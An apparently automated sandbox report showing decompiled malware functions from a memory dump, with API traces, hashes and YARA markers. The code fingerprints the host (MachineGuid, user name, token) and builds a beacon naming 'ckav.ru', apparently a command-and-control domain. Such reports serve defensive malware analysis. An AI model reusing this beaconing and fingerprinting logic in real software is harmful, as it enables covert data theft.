                                        Function 004040BB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 74%
                                        			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}



















                                        0x004040c4
                                        0x004040ce
                                        0x004040d0
                                        0x004040e8
                                        0x004040ea
                                        0x004040ec
                                        0x004040f2
                                        0x0040418d
                                        0x00404190
                                        0x00404184
                                        0x00000000
                                        0x00404184
                                        0x004041a0
                                        0x004041a5
                                        0x004041a7
                                        0x00000000
                                        0x00000000
                                        0x004041a9
                                        0x004041b6
                                        0x004041b8
                                        0x004041be
                                        0x004041cb
                                        0x004041d0
                                        0x004041d1
                                        0x004041d3
                                        0x004041d8
                                        0x004041dc
                                        0x00000000
                                        0x004041e2
                                        0x00404100
                                        0x0040410c
                                        0x00404111
                                        0x0040417a
                                        0x0040417a
                                        0x00000000
                                        0x0040411b
                                        0x0040411b
                                        0x00404120
                                        0x00404122
                                        0x00404122
                                        0x0040412c
                                        0x0040413a
                                        0x0040413c
                                        0x00404140
                                        0x00000000
                                        0x00404142
                                        0x0040414a
                                        0x00404155
                                        0x0040415a
                                        0x0040415e
                                        0x00404168
                                        0x00404174
                                        0x00404176
                                        0x00404176
                                        0x0040417d
                                        0x0040417e
                                        0x00000000
                                        0x00404183
                                        0x00404140

                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: File$AllocCreateReadVirtual
                                        • String ID: .tmp
                                        • API String ID: 3585551309-2986845003
                                        • Opcode ID: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                                        • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                        • Opcode Fuzzy Hash: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                                        • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00413866, Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 79%
                                        			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}































































                                        0x0041386f
                                        0x0041387e
                                        0x00413885
                                        0x00413889
                                        0x0041388c
                                        0x00413890
                                        0x00413893
                                        0x00413897
                                        0x0041389a
                                        0x0041389e
                                        0x004138a1
                                        0x004138a5
                                        0x004138a8
                                        0x004138ac
                                        0x004138af
                                        0x004138b2
                                        0x004138b5
                                        0x004138b8
                                        0x004138bb
                                        0x004138bc
                                        0x004138c4
                                        0x004138c8
                                        0x004138cb
                                        0x004138cf
                                        0x004138d2
                                        0x004138d6
                                        0x004138d7
                                        0x004138df
                                        0x004138e3
                                        0x004138e4
                                        0x004138ea
                                        0x004138eb
                                        0x004138f1
                                        0x004138f5
                                        0x004138f9
                                        0x004138fd
                                        0x00413901
                                        0x00413905
                                        0x00413909
                                        0x0041390d
                                        0x00413911
                                        0x00413915
                                        0x00413919
                                        0x0041391d
                                        0x00413921
                                        0x00413925
                                        0x00413929
                                        0x0041392d
                                        0x00413931
                                        0x00413935
                                        0x00413939
                                        0x0041393d
                                        0x00413941
                                        0x00413950
                                        0x00413959
                                        0x0041395f
                                        0x00413968
                                        0x0041396e
                                        0x00413973
                                        0x00413977
                                        0x00413979
                                        0x00413980
                                        0x00413982
                                        0x00413991
                                        0x0041399c
                                        0x0041399e
                                        0x004139a4
                                        0x004139a9
                                        0x004139ac
                                        0x004139b1
                                        0x004139b1
                                        0x004139b2
                                        0x004139b7
                                        0x004139bc
                                        0x004139c1
                                        0x004139c7
                                        0x004139cd
                                        0x004139cd
                                        0x004139db

                                        APIs
                                        • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                        • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                        • GetLastError.KERNEL32 ref: 0041399E
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Error$CreateLastModeMutex
                                        • String ID:
                                        • API String ID: 3448925889-0
                                        • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                        • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                        • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                        • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004042CF, Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}








                                        0x004042cf
                                        0x004042d5
                                        0x004042df
                                        0x004042e2
                                        0x004042f9
                                        0x004042fb
                                        0x00404300
                                        0x0040430a
                                        0x00404314
                                        0x00404319
                                        0x00404323
                                        0x00404334
                                        0x0040433b
                                        0x0040433b
                                        0x0040433f
                                        0x00404344
                                        0x0040434c

                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                        • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: File$CreatePointerWrite
                                        • String ID:
                                        • API String ID: 3672724799-0
                                        • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                        • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                        • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                        • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412D31, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 34%
                                        			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}






























                                        0x00412d31
                                        0x00412d34
                                        0x00412d39
                                        0x00412d3c
                                        0x00412d49
                                        0x00412d50
                                        0x00412d52
                                        0x00412f24
                                        0x00412f24
                                        0x00412f2b
                                        0x00412f30
                                        0x00412f32
                                        0x00412f37
                                        0x00412f41
                                        0x00412f53
                                        0x00412f53
                                        0x00412f5b
                                        0x00412f60
                                        0x00412d58
                                        0x00412d58
                                        0x00412d63
                                        0x00412d6c
                                        0x00412d73
                                        0x00412d7e
                                        0x00412d7f
                                        0x00412d80
                                        0x00412d81
                                        0x00412d82
                                        0x00412d8f
                                        0x00412da1
                                        0x00412da6
                                        0x00412dae
                                        0x00412db0
                                        0x00412db1
                                        0x00412db5
                                        0x00412dce
                                        0x00412dcf
                                        0x00412dd5
                                        0x00412dda
                                        0x00412db7
                                        0x00412db7
                                        0x00412db8
                                        0x00412dbe
                                        0x00412dc4
                                        0x00412dc9
                                        0x00412dc9
                                        0x00412de2
                                        0x00412de4
                                        0x00412de5
                                        0x00412de7
                                        0x00412de9
                                        0x00412e02
                                        0x00412e03
                                        0x00412e09
                                        0x00412e0e
                                        0x00412deb
                                        0x00412deb
                                        0x00412dec
                                        0x00412df2
                                        0x00412df8
                                        0x00412dfd
                                        0x00412dfd
                                        0x00412e11
                                        0x00412e17
                                        0x00412e19
                                        0x00412e1a
                                        0x00412e1e
                                        0x00412e37
                                        0x00412e38
                                        0x00412e3e
                                        0x00412e43
                                        0x00412e20
                                        0x00412e20
                                        0x00412e21
                                        0x00412e27
                                        0x00412e2d
                                        0x00412e32
                                        0x00412e32
                                        0x00412e4b
                                        0x00412e4d
                                        0x00412e4f
                                        0x00412e7e
                                        0x00412e8a
                                        0x00412e8f
                                        0x00412e51
                                        0x00412e59
                                        0x00412e67
                                        0x00412e6d
                                        0x00412e72
                                        0x00412e72
                                        0x00412e9e
                                        0x00412eaf
                                        0x00412eb4
                                        0x00412ec0
                                        0x00412ece
                                        0x00412edc
                                        0x00412eea
                                        0x00412ef8
                                        0x00412f0f
                                        0x00412f14
                                        0x00412f14
                                        0x00412f17
                                        0x00412f1d
                                        0x00412f1f
                                        0x00000000
                                        0x00412f1f
                                        0x00412f74

                                        APIs
                                        • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                          • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                          • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                          • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$CreateFreeProcessThread_wmemset
                                        • String ID: ckav.ru
                                        • API String ID: 2915393847-2696028687
                                        • Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                        • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                        • Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                        • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040632F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}







                                        0x00406340
                                        0x00406345
                                        0x00406373
                                        0x00406373
                                        0x00406347
                                        0x0040634f
                                        0x00406354
                                        0x00406357
                                        0x0040635c
                                        0x00406366
                                        0x0040636d
                                        0x00000000
                                        0x00406368
                                        0x00406368
                                        0x00406368
                                        0x00406366
                                        0x0040637a

                                        APIs
                                          • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                          • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                        • _wmemset.LIBCMT ref: 0040634F
                                          • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateNameProcessUser_wmemset
                                        • String ID: CA
                                        • API String ID: 2078537776-1052703068
                                        • Opcode ID: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
                                        • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                        • Opcode Fuzzy Hash: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
                                        • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00406086, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}





                                        0x00406094
                                        0x004060a8
                                        0x004060ab

                                        APIs
                                        • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: InformationToken
                                        • String ID: IDA
                                        • API String ID: 4114910276-365204570
                                        • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                        • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                        • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                        • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402C03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}





                                        0x00402c10
                                        0x00402c15
                                        0x00402c1b
                                        0x00402c1e

                                        APIs
                                        • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc
                                        • String ID: s1@
                                        • API String ID: 190572456-427247929
                                        • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                        • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                        • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                        • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00404A52, Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}









                                        0x00404a56
                                        0x00404a65
                                        0x00404a6a
                                        0x00404ad1
                                        0x00404ad1
                                        0x00404a6c
                                        0x00404a71
                                        0x00404a79
                                        0x00404a85
                                        0x00404a9a
                                        0x00404a9e
                                        0x00404acb
                                        0x00000000
                                        0x00404aa0
                                        0x00404aac
                                        0x00404abc
                                        0x00404ac1
                                        0x00404ac6
                                        0x00404ac6
                                        0x00404a9e
                                        0x00404ad9

                                        APIs
                                          • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                          • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                        • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                        • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 1425999871-0
                                        • Opcode ID: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
                                        • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                        • Opcode Fuzzy Hash: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
                                        • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402BAB, Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00402BAB(void* _a4) {
				void* _t3;
				char _t5;

				if(_a4 != 0) {
					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
					return _t5;
				}
				return _t3;
			}





                                        0x00402bb2
                                        0x00402bc0
                                        0x00000000
                                        0x00402bc0
                                        0x00402bc7

                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                        • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$FreeProcess
                                        • String ID:
                                        • API String ID: 3859560861-0
                                        • Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                        • Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
                                        • Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
